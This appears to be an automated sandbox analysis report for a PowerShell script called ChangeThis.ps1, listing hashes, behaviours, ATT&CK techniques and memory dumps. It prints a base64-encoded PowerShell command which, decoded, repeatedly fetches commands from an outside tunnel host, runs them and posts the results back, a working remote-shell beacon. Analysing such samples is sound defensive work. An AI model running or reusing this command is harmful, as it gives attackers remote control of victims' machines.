cd5836660781327546b4f84e4988a9eacd612191826ed776b394e2215efe804b

Analysis

max time kernel
0s
max time network
119s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
30/06/2024, 21:20

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ChangeThis.ps1
Size

1KB
MD5

41edd0f62b0c996b8330f1d59b59dcad
SHA1

b8a54269a5c4f526b710c5b1f32d9830ba3e6b74
SHA256

cd5836660781327546b4f84e4988a9eacd612191826ed776b394e2215efe804b
SHA512

f36b123f529f57ccfd580a0ae923d709916c5632844fc2ebb67e62d2b4a70987844e8d7240ee09b2f4a1fbfce5453bba549c457f163f37d4c4a71dfb0a9a9114

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2424	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2424	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2424	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2424 wrote to memory of 2020	2424	powershell.exe	29
PID 2424 wrote to memory of 2020	2424	powershell.exe	29
PID 2424 wrote to memory of 2020	2424	powershell.exe	29

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ChangeThis.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAA2AGYAPQAnAHcAaQBjAGsAZQBkAC0AcABsAGEAYwBlAHMALQBjAG8AdQBnAGgALgBsAG8AYwBhAC4AbAB0ACcAOwAkADMAMgA2AD0AJwA4AGMAYwA4ADAAZABkADQALQA0ADQANAA1ADkAYgAxADQALQA0ADkAMQAyADIAOQA3AGYAJwA7ACQAYgA3ADYAZgAyAD0AJwBoAHQAdABwAHMAOgAvAC8AJwA7ACQAMgBlADMAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAYgA3ADYAZgAyACQANgBmAC8AOABjAGMAOAAwAGQAZAA0ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtAGEAZgBjADEALQAwAGEAYwBiACIAPQAkADMAMgA2ADsAIgBCAHkAcABhAHMAcwAtAFQAdQBuAG4AZQBsAC0AUgBlAG0AaQBuAGQAZQByACIAPQAkADMAMgA2AH0AOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAJABjAD0AKABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAYgA3ADYAZgAyACQANgBmAC8ANAA0ADQANQA5AGIAMQA0ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtAGEAZgBjADEALQAwAGEAYwBiACIAPQAkADMAMgA2ADsAIgBCAHkAcABhAHMAcwAtAFQAdQBuAG4AZQBsAC0AUgBlAG0AaQBuAGQAZQByACIAPQAkADMAMgA2AH0AKQAuAEMAbwBuAHQAZQBuAHQAOwBpAGYAIAAoACQAYwAgAC0AbgBlACAAJwBOAG8AbgBlACcAKQAgAHsAJAByAD0AaQBlAHgAIAAkAGMAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAEUAcgByAG8AcgBWAGEAcgBpAGEAYgBsAGUAIABlADsAJAByAD0ATwB1AHQALQBTAHQAcgBpAG4AZwAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJAByADsAJAB0AD0ASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAYgA3ADYAZgAyACQANgBmAC8ANAA5ADEAMgAyADkANwBmACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AYQBmAGMAMQAtADAAYQBjAGIAIgA9ACQAMwAyADYAOwAiAEIAeQBwAGEAcwBzAC0AVAB1AG4AbgBlAGwALQBSAGUAbQBpAG4AZABlAHIAIgA9ACQAMwAyADYAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=
  2⤵
  PID:2020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A29POUYG3M0C2LT5JG5I.temp

Filesize
7KB

MD5
8ea6e0948170d883d43316f6aa33e26d

SHA1
2319cee17860b0d6e14832bb5a78e5326e47ceb3

SHA256
63c8160152fc3d7e255d186e7064ea5ed5961afa0f0fa26458079fe343e69f60

SHA512
99b091193699d7059a40cf8faa6158992bfe385d97c83c020ee456b8b74d780944e4acfc1403faeffbee440a085d73e9dba6d4cd44d973573e86ee8506711feb

Download Submit
memory/2020-15-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2020-17-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2424-4-0x000007FEF591E000-0x000007FEF591F000-memory.dmp

Filesize
4KB

Download
memory/2424-5-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/2424-7-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2424-14-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2424-8-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download
memory/2424-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/2424-16-0x000007FEF5660000-0x000007FEF5FFD000-memory.dmp

Filesize
9.6MB

Download